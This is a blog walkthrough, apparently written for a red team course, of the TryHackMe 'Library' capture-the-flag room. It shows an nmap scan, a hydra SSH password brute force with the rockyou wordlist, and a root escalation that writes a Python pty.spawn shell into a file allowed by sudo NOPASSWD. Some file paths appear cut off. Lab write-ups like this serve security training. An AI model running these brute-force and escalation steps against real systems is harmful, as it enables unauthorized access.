TryHackMe: Library room walkthrough

This is a write up covering steps taken to solve a beginner level security challenge, find user.txt and root.txt flags for Library room in TryHackMe platform.

This blog is written as part of task of Masters Certification in Red Team Program from HackerU.

Step 1 : Connect to TryHackMe and start target machine.

  1. Download OpenVPN configuration setting from TryHackMe platform
  2. Connect to TryHackMe by running the command in kali terminal:

sudo openvpn /pathtoOVPNfile.ovpn

3. Start machine in ‘library’ room — target ip address will be displayed in a minute.

Step 2 : Information gathering using Nmap

  1. Start nmap scan of the target ip:

nmap -A -O <target ip>

nmap output

Step 3: Detailed Findings

Open ports:

22 : SSH

80 : http Apache httpd 2.4.18

  1. Navigating to robots.txt got hint as “rockyou”

2. Accessing open ports

port 80 : Username is displayed as author

Port 80

3. Since port 22 is open, try to brute force and find user credentials with above found username and clue from robots.txt

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh

Credentials found

4. Login with above found credentials through SSH, login is successful

ssh meliodas@<targetip>

5. Found user.txt

6. checking for privileges

sudo -l

Found privileges for /home/meliodas/

7. As has permission to run with sudo NOPASSWD , so remove and create a new file.


echo ‘import pty;pty.spawn(“/bin/sh”)’ > /home/meliodas/

8. Run file with sudo permission >user got root access

sudo python /home/meliodas/

9. Navigate to root folder > found root.txt file

With these steps, I was able to answer questions posted in Library room on TryHackMe.

Thank you for reading this blog..




Software Tester

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Delphi 11.1 Release — What’s new?

Add two numbers represented by linked lists

Share your App content smoothly using Firebase Dynamic Links

📢 announcement!

CKA Tips & Tricks

Creating a Random Password Generator Using Python

Multiline graph in Unity with Animation and Animation Curves

Why do functional failures matter?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Software Tester

More from Medium

TryHackMe Pickle Rick Writeup

Subscribe to an RSS feed on Windows using Raven

Let us Encrypt with SSL

Hack the Box | Previse